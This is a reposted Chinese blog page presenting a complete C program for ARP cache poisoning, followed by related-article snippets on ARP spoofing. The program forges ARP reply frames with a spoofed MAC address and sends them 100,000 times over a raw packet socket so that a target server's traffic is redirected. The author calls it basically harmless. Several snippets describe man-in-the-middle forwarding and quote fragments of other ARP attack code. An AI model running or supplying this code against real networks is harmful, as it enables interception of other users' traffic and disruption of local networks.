转贴-------ARP攻击C语言代码

最新推荐文章于 2021-05-25 13:26:06 发布
最新推荐文章于 2021-05-25 13:26:06 发布
阅读量438 收藏 4
点赞数
文章标签: c/c++
原文链接:http://www.cnblogs.com/lthxk-yl/archive/2013/05/26/3100717.html
版权

ARP攻击C语言代码

本代码基本不具备危害性,只是通过MAC地址欺骗修改服务器缓冲区信息实现消息拦截。

假设被攻击服务器 IP 地址为 192.168.20.8 ,MAC地址为    00:0C:29:BD:1C:EF

被拦截消息计算机IP地址为    192.168.20.9 

本机MAC 地址为 00:0C:29:AF:FB:D3

 

#include<stdio.h>
#include<string.h>
#include<unistd.h>
#include<stdlib.h>
#include<net/if_arp.h>
#include<net/ethernet.h>
#include<sys/types.h>
#include<sys/socket.h>

#define ARP_LEN 30             //ARP帧头字节数

void mac_str( char *mac, char *buf )
{
     sscanf(mac, "%x:%x:%x:%x:%x:%x", buf, buf+1, buf+2, buf+3, buf+4, buf+5);     
}

void ip_str( char *ip, char *buf )
{
     sscanf(ip, "%d.%d.%d.%d", buf, buf+1, buf+2, buf+3);     
}

void encapsulate_frame( char *dest_mac, char *source_mac, unsigned int type, char *buf )
{
     mac_str(dest_mac, buf);
     mac_str(source_mac, buf+6);
     *(short *)(buf+12) = htons(type);
}

void encapsulate_arp( unsigned short ar_op, char *source_mac, char *source_ip, char *dest_mac, char *dest_ip, char *buf )
{
     struct arphdr parp;
     
     parp.ar_hrd = htons(ARPHRD_ETHER);
     parp.ar_pro = htons(ETHERTYPE_IP);
     parp.ar_hln = 6;
     parp.ar_pln = 4;
     parp.ar_op = htons(ar_op);
     memcpy(buf, &parp, sizeof(struct arphdr));
     
     char addr_buf[20];
     
     mac_str(source_mac, addr_buf);
     ip_str(source_ip, addr_buf + 6);
     mac_str(dest_mac, addr_buf + 10);
     ip_str(dest_ip, addr_buf + 16);
     memcpy(buf + sizeof(struct arphdr), addr_buf, 20);     
}

int open_packet_socket( void )
{
    int sock_fd;
    if( (sock_fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_PARP)) ) < 0 )
    {
        perror("Create socket error.\n");
        exit(-1);    
    }
    
    return sock_fd;        
}

 

int main( int argc, char **argv )
{
    char *source_ip = "192.168.20.9";          // 真实 IP 地址 
    char *source_mac = "00:0C:29:AF:FB:D3";    // 欺骗 MAC 地址 
    
    char *dest_ip = "192.168.20.8";
    char *dest_mac = "00:0C:29:BD:1C:EF";
    
    char *buf = (char *)malloc(sizeof(struct ether_header) + ARP_LEN);    
    
    encapsulate_frame(dest_mac, source_mac, ETHERTYPE_ARP, buf);
    encapsulate_arp(ARPOP_REPLY, source_mac, source_ip, dest_mac, dest_ip, buf+sizeof(struct ether_header));
    
    int sock_fd = open_packet_socket();
    int i;
    struct sockaddr to;
    
    bzero( &to, sizeof(struct sockaddr) );
    to.sa_family = AF_INET;
    strcpy(to.sa_data, "eth0");     //通过eth0网卡发送; 
    
    for(i=0; i<100000; i++)
    {
        /* 44为以太网帧头长度加ARP帧头长度 ,sizeof(ether_header) + ARP_LEN */
        
        sendto(sock_fd, buf, 44, 0, &to, sizeof(struct sockaddr));
        usleep(100000);         
    }
    
    printf("Send over.\n");
    
    return 0;
}

 

转载于:https://www.cnblogs.com/lthxk-yl/archive/2013/05/26/3100717.html

weixin_30467087
关注
C语言实现ARP攻击
03-21
利用C语言实现ARP攻击,完成了断开目标网络以及接受并转发目标流量的功能
ARP攻击测试C语言代码
11-05
这是我自己用C语言写的,用于学习ARP攻击原理的测试源代码。仅供学习研究使用。
ARP攻击测试代码(C)
styxqdz的专栏
11-01 875
  #include #include #include void main(int argc, char **argv){pcap_t *fp;char errbuf[PCAP_ERRBUF_SIZE];u_char packet[100];int j; pcap_if_t *alldevs;pcap_if_t *d;int inum;int i=0,m,n;  if
网络信息安全攻击C语言实现,C语言实现ARP攻击(附源码)
weixin_36312811的博客
05-25 1877
C语言实现ARP攻击信息安全原理——ARP攻击班级:07计算机1班 姓名:胡益铭 学号:E07620112 ARP原理:ARP,即地址解析协议,实现通过IP地址得知其物理地址。在TCP/IP网络环境下,每个主机都分配了一个32位的IP地址,这种互联网地址是在网际范围标识主机的一种逻辑地址。为了让报文在物理网路上传送,必须知道对方目的主机的物理地址。这样就存在把IP地址变换成物理地址的地...
Arp攻击代码
张亚楠的博客
04-17 1591
以下便是WinPcap环境下的Arp攻击代码#include #include #include int main() { pcap_if_t *alldevs;//定义一个网络接口的一个节点 pcap_if_t *d; int i=0,inum=0,j; char errbuf[PCAP_ERRBUF_SIZE]; u_char packet[60]; pcap_t *adhandle;
行业分类-设备装置-FPC吸附胶纸转贴组件.zip
08-22
本压缩包文件"行业分类-设备装置-FPC吸附胶纸转贴组件.zip"主要关注的是FPC在实际应用中的一个重要环节——FPC吸附胶纸转贴组件。这个组件在FPC的制造和组装过程中起到关键作用,确保FPC能够稳定地固定在设备上,并...
行业文档-设计装置-木器、玻璃用贴花纸生产及转贴方法.zip
08-28
《木器、玻璃用贴花纸生产及转贴方法》是一个深入探讨装饰材料工艺的行业文档,主要聚焦于贴花纸在木器和玻璃制品上的应用。这份文档可能包含了从贴花纸的设计、生产到实际转贴过程中的各种技术细节和实践经验。 1....
rdt.rar_RDT-246在线播放_rdt277下载_在线播放
09-24
压缩包内的文件“[转贴]RDT格式--Perfect of imperfect.htm”很可能是一个HTML文档,其中包含了对RDT格式的讨论,可能是从其他地方转贴过来的文章或者研究。文档标题中的“Perfect of imperfect”可能是在探讨RDT...
加版权防转贴防复制代码插件 for z-blog.rar
07-14
一复制,发现粘贴不到地址栏上,我就粘贴在记事本里看了看,原来他在后面加了一段转贴版权代码,!不管复制哪里,都在后面有本文来源于采飞博客,感觉这代码挺不错的,可以防止别人转贴不加上你的版权..呵呵!我赶紧找采飞博...
动网转贴-易语言
06-13
标题中的“动网转贴-易语言”表明这是一个基于易语言开发的系统工具,主要用于在论坛或网络上转发或分享内容。易语言是中国自主研发的一种高级编程语言,它以中文编程为特色,旨在降低编程难度,让更多人能参与到...
arp攻击程序代码
03-05
一般的arp spoof是向被欺骗主机发送ARP REPLY数据报,把其中的源IP地址置为被欺骗主机要发包去的主机地址,源MAC地址却改为自己的MAC地址。假设有两台机器A,B,发送一个ARP REPLY数据报给A,其中源IP地址为B的地址,源MAC地址为我的机器的MAC地址(IPRouter功能打开确保数据被转发),那么A发送到B的数据报就发到我的机器上了,同样对B做相同到操作,那么A<==>B之间的数据就会源源不断的通过我的机器转发,直到一个正常的ARP包更改了A,B的arp缓存为止。
ARP攻击代码实例
10-31
现在有一台计算机A(IP:192.168.85.1 MAC:AA-AA-AA-AA-AA-AA),另一台计算机B(IP:192.168.85.100 MAC:BB-BB-BB-BB-BB-BB)现在用A去 ping B。看见 Reply from 192.168.85.100: bytes=32 time<10ms TTL=32 这样的信息。然后在运行中输入arp -a,会看见 192.168.8.100 BB-BB-BB-BB-BB-BB dynamic这样的信息。那就是arp高速缓存中IP地址和MAC地址的一个映射关系,在以太网中,数据传递靠的是MAC,而并不是IP地址。其实在这背后就隐藏着arp的秘密。你一定会问,网络上这么多计算机,A是怎么找到B的?那么我们就来分析一下细节。首先A并不知道B在哪里,那么A首先就会发一个广播的ARP请求,即目的MAC为FF-FF-FF-FF-FF-FF,目的IP为B的192.168.85.100,再带上自己的源IP,和源 MAC。那么一个网段上的所有计算机都会接收到来自A的ARP请求,由于每台计算机都有自己唯一的MAC和IP,那么它会分析目的IP即 192.168.85.100是不是自己的IP?如果不是,网卡会自动丢弃数据包。如果B接收到了,经过分析,目的IP是自己的,于是更新自己的ARP高速缓存,记录下A的IP和MAC。然后B就会回应A一个ARP应答,就是把A的源IP,源MAC变成现在目的IP,和目的MAC,再带上自己的源IP,源 MAC,发送给A。当A机接收到ARP应答后,更新自己的ARP高速缓存,即把arp应答中的B机的源IP,源MAC的映射关系记录在高速缓存中。那么现在A机中有B的MAC和IP,B机中也有A的MAC和IP。arp请求和应答过程就结束了。由于arp高速缓存是会定时自动更新的,在没有静态绑定的情况下,IP和MAC的映射关系会随时间流逝自动消失。在以后的通信中,A在和B通信时,会首先察看arp高速缓存中有没有B的IP和MAC的映射关系,如果有,就直接取得MAC地址,如果没有就再发一次ARP请求的广播,B再应答即重复上面动作。 好了在了解了上面基本arp通信过程后,arp欺骗就不那神秘了,计算机在接收到ARP应答的时候,不管有没有发出ARP请求,都会更新自己的高速缓存。利用这点如果C机(IP:192.168.85.200 MAC:CC-CC-CC-CC-CC-CC)伪装成B机向A发出ARP应答,自己伪造B机的源MAC为CC-CC-CC-CC-CC-CC,源IP依旧伪造成B的IP即192.168.85.100,是那么A机的ARP缓存就会被我们伪造的MAC所更新,192.168.85.100对应的MAC就会变成CC-CC-CC-CC-CC-CC.如果A机再利用192.168.85.100即B的IP和B通信,实际上数据包却发给了C机,B机根本就接收不到了。实例基于WINCAP编写,描述其本源理与流程.
arp攻击中的具体vc代码实现
04-17
这是一个很好地资源用于大家的交流 请大家好好珍惜这个资源也希望 大家在技术的道路上走远些
ARP攻击原理和kali实现ARP攻击
cuttleKK的博客
10-28 1万+
目录一、ARP协议和ARP攻击1.ARP协议2.利用wireshark分析ARP数据包3.ARP攻击二、kali实现ARP攻击 一、ARP协议和ARP攻击 1.ARP协议 ARP协议,地址解析协议(Address Resolution Protocol),用来实现IP地址到物理地址的映射。 每一台主机都设有一个ARP高速缓存(ARP cache),里面有本局域网上的各主机和路由器的IP地址到硬件地址的映射表,主机如何获取这些地址的? 例如,主机A向本局域网上的某台主机B发送IP数据报时,要先在ARP高速缓存
arp攻击代码(收集)
weixin_30598225的博客
08-25 421
#include <stdlib.h> #include <stdio.h> #include <pcap.h> //winpcap的头文件 #include <winsock2.h> #include <process.h> //多线程编程的头文件 #include <windows.h> #include ...
网络攻击--ARP攻击
ghevinn欢迎您光临
11-23 1629
ARP攻击原理: 用很显浅形象的图文去解释一下,大概就如下图: 班长在发信件时喊某你的名字xxx,有人冒充你一直对班长说,我是xxx,但这个班长只认名字不去求证,所以就把信给了那个冒认的人了,那么很可惜你就看不到本来属于你的信件了。就这样就被“欺骗攻击”了。 同理,ARP欺骗攻击就像上例一样,欺骗局域网内的路由器(发信的班长),故意让路由器把数据传给错误的主机(同学)
C语言实现简单ARP欺骗小工具
热门推荐
Jung_zhang的专栏
08-03 1万+
在WireShark协议分析的学习过程学习了ARP协议的数据包格式,所以准备自制一个小小的ARP欺骗工具。在制作该工具前需要掌握如下知识:   一、ARP协议内容  ARP(Address Resolution Protocol)协议的基本功能是通过IP地址找到对应的硬件地址,ARP协议的工作过程是(假设A主机(IP:192.168.1.110、MAC:0A:11:22:33:44:01)要和B主
ARP攻击
xuejiao_lin的博客
04-27 1103
(1)    ARP是一个位于TCP/IP协议栈中的网络层,负责某个IP地址解析成对应的MAC地址(2)    ARP协议的基本功能是通过目标设备的IP地址,查询目标设备的MAC地址,以确保通信的进行(3)    ARP攻击的局限性:ARP攻击仅能在以太网进行,无法对外网进行攻击(4)    ARP攻击的原理:ARP攻击 是通过伪造MAC地址和IP地址实现ARP欺骗,能够在网络中产生大量的通信量使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值